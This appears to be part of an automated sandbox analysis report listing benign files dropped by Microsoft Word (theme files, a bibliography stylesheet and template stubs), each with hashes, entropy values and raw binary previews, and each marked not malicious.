                              Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):278
                              Entropy (8bit):3.516359852766808
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                              MD5:960E28B1E0AB3522A8A8558C02694ECF
                              SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                              SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                              SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):314
                              Entropy (8bit):3.5230842510951934
                              Encrypted:false
                              SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                              MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                              SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                              SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                              SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):294178
                              Entropy (8bit):4.977758311135714
                              Encrypted:false
                              SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                              MD5:0C9731C90DD24ED5CA6AE283741078D0
                              SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                              SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                              SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):966946
                              Entropy (8bit):7.8785200658952
                              Encrypted:false
                              SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                              MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                              SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                              SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                              SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                              Malicious:false
                              Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):282
                              Entropy (8bit):3.5323495192404475
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                              MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                              SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                              SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                              SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):976001
                              Entropy (8bit):7.791956689344336
                              Encrypted:false
                              SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                              MD5:9E563D44C28B9632A7CF4BD046161994
                              SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                              SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                              SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                              Malicious:false
                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):278
                              Entropy (8bit):3.5270134268591966
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                              MD5:327DA4A5C757C0F1449976BE82653129
                              SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                              SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                              SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):1204049
                              Entropy (8bit):7.92476783994848
                              Encrypted:false
                              SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                              MD5:FD5BBC58056522847B3B75750603DF0C
                              SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                              SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                              SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                              Malicious:false
                              Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):276
                              Entropy (8bit):3.5364757859412563
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                              MD5:CD465E8DA15E26569897213CA9F6BC9C
                              SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                              SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                              SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):1463634
                              Entropy (8bit):7.898382456989258
                              Encrypted:false
                              SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                              MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                              SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                              SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                              SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                              Malicious:false
                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):280
                              Entropy (8bit):3.5286004619027067
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                              MD5:40FF521ED2BA1B015F17F0B0E5D95068
                              SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                              SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                              SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):1091485
                              Entropy (8bit):7.906659368807194
                              Encrypted:false
                              SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                              MD5:2192871A20313BEC581B277E405C6322
                              SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                              SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                              SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                              Malicious:false
                              Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):280
                              Entropy (8bit):3.5301133500353727
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                              MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                              SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                              SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                              SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):1750795
                              Entropy (8bit):7.892395931401988
                              Encrypted:false
                              SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                              MD5:529795E0B55926752462CBF32C14E738
                              SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                              SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                              SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                              Malicious:false
                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):280
                              Entropy (8bit):3.528155916440219
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                              MD5:AA7B919B21FD42C457948DE1E2988CB3
                              SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                              SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                              SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):2357051
                              Entropy (8bit):7.929430745829162
                              Encrypted:false
                              SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                              MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                              SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                              SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                              SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                              Malicious:false
                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):276
                              Entropy (8bit):3.516423078177173
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                              MD5:5402138088A9CF0993C08A0CA81287B8
                              SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                              SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                              SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):2218943
                              Entropy (8bit):7.942378408801199
                              Encrypted:false
                              SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                              MD5:EE33FDA08FBF10EF6450B875717F8887
                              SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                              SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                              SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                              Malicious:false
